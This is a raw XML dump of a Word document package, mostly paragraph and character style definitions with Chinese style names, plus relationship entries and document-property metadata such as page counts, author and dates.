    <w:rsid w:val="FFFB7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7"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7"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7"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7"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lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="2">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="35"/>
    <w:qFormat/>
    <w:uiPriority w:val="1"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:beforeLines="250" w:afterLines="50" w:line="400" w:lineRule="exact"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="微软雅黑"/>
      <w:b/>
      <w:kern w:val="44"/>
      <w:sz w:val="48"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="3">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="2"/>
    <w:next w:val="4"/>
    <w:link w:val="39"/>
    <w:qFormat/>
    <w:uiPriority w:val="1"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
      </w:numPr>
      <w:spacing w:beforeLines="100"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:bCs/>
      <w:sz w:val="30"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="6">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="4"/>
    <w:link w:val="40"/>
    <w:qFormat/>
    <w:uiPriority w:val="1"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:beforeLines="50" w:afterLines="50"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="7">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="41"/>
    <w:qFormat/>
    <w:uiPriority w:val="1"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:beforeLines="50" w:afterLines="50" w:line="377" w:lineRule="auto"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="黑体"/>
      <w:bCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="8">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="42"/>
    <w:qFormat/>
    <w:uiPriority w:val="1"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="4"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="120" w:after="110"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="黑体"/>
      <w:bCs/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="9">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="43"/>
    <w:qFormat/>
    <w:uiPriority w:val="1"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:spacing w:before="240" w:after="64" w:line="317" w:lineRule="auto"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsiaTheme="minorEastAsia"/>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="10">
    <w:name w:val="heading 7"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="44"/>
    <w:qFormat/>
    <w:uiPriority w:val="1"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="3"/>
      </w:numPr>
      <w:spacing w:before="240" w:after="64" w:line="317" w:lineRule="auto"/>
      <w:outlineLvl w:val="6"/>
    </w:pPr>
    <w:rPr>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="11">
    <w:name w:val="heading 8"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="45"/>
    <w:qFormat/>
    <w:uiPriority w:val="1"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="64" w:line="317" w:lineRule="auto"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="7"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
      <w:sz w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="12">
    <w:name w:val="heading 9"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="46"/>
    <w:qFormat/>
    <w:uiPriority w:val="1"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="8"/>
        <w:numId w:val="4"/>
      </w:numPr>
      <w:spacing w:before="240" w:after="64" w:line="317" w:lineRule="auto"/>
      <w:outlineLvl w:val="8"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>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4">
    <w:name w:val="Body Text First Indent"/>
    <w:basedOn w:val="5"/>
    <w:link w:val="38"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:ind w:firstLine="420" w:firstLineChars="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="5">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="37"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="1"/>
    <w:pPr>
      <w:spacing w:after="120"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="13">
    <w:name w:val="caption"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="7"/>
    <w:rPr>
      <w:rFonts w:eastAsia="黑体" w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="14">
    <w:name w:val="Document Map"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="50"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="15">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="64"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:jc w:val="left"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="16">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:spacing w:line="320" w:lineRule="exact"/>
      <w:ind w:left="150" w:leftChars="150"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Calibri"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="17">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="51"/>
    <w:qFormat/>
    <w:uiPriority w:val="7"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="18">
    <w:name w:val="footer"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="48"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4153"/>
        <w:tab w:val="right" w:pos="8306"/>
      </w:tabs>
      <w:snapToGrid w:val="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="19">
    <w:name w:val="header"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="47"/>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20">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:spacing w:line="400" w:lineRule="exact"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
      <w:b/>
      <w:bCs/>
      <w:caps/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="21">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="49"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="60" w:line="312" w:lineRule="auto"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体" w:cs="Arial"/>
      <w:bCs/>
      <w:kern w:val="28"/>
      <w:sz w:val="30"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="22">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:spacing w:line="400" w:lineRule="exact"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Calibri"/>
      <w:bCs/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="2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4">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="1"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="25">
    <w:name w:val="Title"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="36"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:beforeLines="50" w:afterLines="50" w:line="700" w:lineRule="exact"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="微软雅黑" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="48"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="26">
    <w:name w:val="annotation subject"/>
    <w:basedOn w:val="15"/>
    <w:next w:val="15"/>
    <w:link w:val="65"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="28">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="27"/>
    <w:qFormat/>
    <w:uiPriority w:val="59"/>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0">
    <w:name w:val="Strong"/>
    <w:qFormat/>
    <w:uiPriority w:val="22"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="31">
    <w:name w:val="Emphasis"/>
    <w:qFormat/>
    <w:uiPriority w:val="7"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="32">
    <w:name w:val="Hyperlink"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="33">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="29"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="34">
    <w:name w:val="annotation reference"/>
    <w:basedOn w:val="29"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="35">
    <w:name w:val="标题 1 字符"/>
    <w:basedOn w:val="29"/>
    <w:link w:val="2"/>
    <w:qFormat/>
    <w:uiPriority w:val="1"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="微软雅黑" w:cs="Times New Roman"/>
      <w:b/>
      <w:kern w:val="44"/>
      <w:sz w:val="48"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="36">
    <w:name w:val="标题 字符"/>
    <w:basedOn w:val="29"/>
    <w:link w:val="25"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="微软雅黑" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="48"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="37">
    <w:name w:val="正文文本 字符"/>
    <w:basedOn w:val="29"/>
    <w:link w:val="5"/>
    <w:qFormat/>
    <w:uiPriority w:val="1"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="38">
    <w:name w:val="正文文本首行缩进 字符"/>
    <w:basedOn w:val="37"/>
    <w:link w:val="4"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="39">
    <w:name w:val="标题 2 字符"/>
    <w:basedOn w:val="29"/>
    <w:link w:val="3"/>
    <w:qFormat/>
    <w:uiPriority w:val="1"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="微软雅黑" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="44"/>
      <w:sz w:val="30"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="40">
    <w:name w:val="标题 3 字符"/>
    <w:basedOn w:val="29"/>
    <w:link w:val="6"/>
    <w:qFormat/>
    <w:uiPriority w:val="1"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体" w:cs="Times New Roman"/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="41">
    <w:name w:val="标题 4 字符"/>
    <w:basedOn w:val="29"/>
    <w:link w:val="7"/>
    <w:qFormat/>
    <w:uiPriority w:val="1"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="黑体" w:cs="Times New Roman"/>
      <w:bCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="42">
    <w:name w:val="标题 5 字符"/>
    <w:basedOn w:val="29"/>
    <w:link w:val="8"/>
    <w:qFormat/>
    <w:uiPriority w:val="1"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="黑体" w:cs="Times New Roman"/>
      <w:bCs/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="43">
    <w:name w:val="标题 6 字符"/>
    <w:basedOn w:val="29"/>
    <w:link w:val="9"/>
    <w:qFormat/>
    <w:uiPriority w:val="1"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="44">
    <w:name w:val="标题 7 字符"/>
    <w:basedOn w:val="29"/>
    <w:link w:val="10"/>
    <w:qFormat/>
    <w:uiPriority w:val="1"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="45">
    <w:name w:val="标题 8 字符"/>
    <w:basedOn w:val="29"/>
    <w:link w:val="11"/>
    <w:qFormat/>
    <w:uiPriority w:val="1"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体" w:cs="Times New Roman"/>
      <w:sz w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="46">
    <w:name w:val="标题 9 字符"/>
    <w:basedOn w:val="29"/>
    <w:link w:val="12"/>
    <w:qFormat/>
    <w:uiPriority w:val="1"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体" w:cs="Times New Roman"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="47">
    <w:name w:val="页眉 字符"/>
    <w:basedOn w:val="29"/>
    <w:link w:val="19"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="48">
    <w:name w:val="页脚 字符"/>
    <w:basedOn w:val="29"/>
    <w:link w:val="18"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="49">
    <w:name w:val="副标题 字符"/>
    <w:basedOn w:val="29"/>
    <w:link w:val="21"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体" w:cs="Arial"/>
      <w:bCs/>
      <w:kern w:val="28"/>
      <w:sz w:val="30"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="50">
    <w:name w:val="文档结构图 字符"/>
    <w:basedOn w:val="29"/>
    <w:link w:val="14"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="51">
    <w:name w:val="批注框文本 字符"/>
    <w:basedOn w:val="29"/>
    <w:link w:val="17"/>
    <w:qFormat/>
    <w:uiPriority w:val="7"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="52">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="7"/>
    <w:pPr>
      <w:ind w:firstLine="420" w:firstLineChars="200"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="53">
    <w:name w:val="TOC 标题1"/>
    <w:basedOn w:val="2"/>
    <w:next w:val="1"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:widowControl/>
      <w:numPr>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:spacing w:before="480" w:line="276" w:lineRule="auto"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="宋体"/>
      <w:bCs/>
      <w:color w:val="365F91"/>
      <w:kern w:val="0"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="54">
    <w:name w:val="页码1"/>
    <w:basedOn w:val="29"/>
    <w:qFormat/>
    <w:uiPriority w:val="7"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="55">
    <w:name w:val="style2"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="8"/>
    <w:pPr>
      <w:widowControl/>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="56">
    <w:name w:val="正文文本缩进1"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="1"/>
    <w:pPr>
      <w:spacing w:after="120"/>
      <w:ind w:left="420" w:leftChars="200"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="57">
    <w:name w:val="Char Char Char Char"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="8"/>
    <w:pPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:ind w:firstLine="617" w:firstLineChars="257"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="58">
    <w:name w:val="Char"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="8"/>
    <w:pPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:ind w:firstLine="617" w:firstLineChars="257"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="59">
    <w:name w:val="正文首行缩进1"/>
    <w:basedOn w:val="5"/>
    <w:qFormat/>
    <w:uiPriority w:val="7"/>
    <w:pPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:ind w:firstLine="200" w:firstLineChars="200"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="60">
    <w:name w:val="正文缩进1"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="1"/>
    <w:pPr>
      <w:ind w:firstLine="420"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="61">
    <w:name w:val="列出段落1"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="7"/>
    <w:pPr>
      <w:ind w:firstLine="420" w:firstLineChars="200"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="6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3">
    <w:name w:val="未处理的提及1"/>
    <w:basedOn w:val="29"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="64">
    <w:name w:val="批注文字 字符"/>
    <w:basedOn w:val="29"/>
    <w:link w:val="15"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:kern w:val="2"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="65">
    <w:name w:val="批注主题 字符"/>
    <w:basedOn w:val="64"/>
    <w:link w:val="26"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="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9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item1.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml"/><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57D87-1BBE-4A3A-85F6-4800E2B4C0FF}">
  <ds:schemaRefs/>
</ds:datastoreItem>
</file>

<file path=docProps/app.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes">
  <Template>Normal</Template>
  <Pages>14</Pages>
  <Words>2208</Words>
  <Characters>2652</Characters>
  <Lines>75</Lines>
  <Paragraphs>21</Paragraphs>
  <TotalTime>0</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>2673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2025-04-24T07:37:00Z</dcterms:created>
  <dc:creator>hjr</dc:creator>
  <cp:lastModifiedBy>乀.</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-20T08:19:35Z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4C2E65E918EC4D489D81053600C8133B_13</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="KSOTemplateDocerSaveRecord">
    <vt:lpwstr>eyJoZGlkIjoiNmE0MDJkNDNkZTkxMzliOTBlYTNjZTFmZTQ1NWY4NTMiLCJ1c2VySWQiOiI3NTY0MTM0MjkifQ==</vt:lpwstr>
  </property>
</Properties>
</file>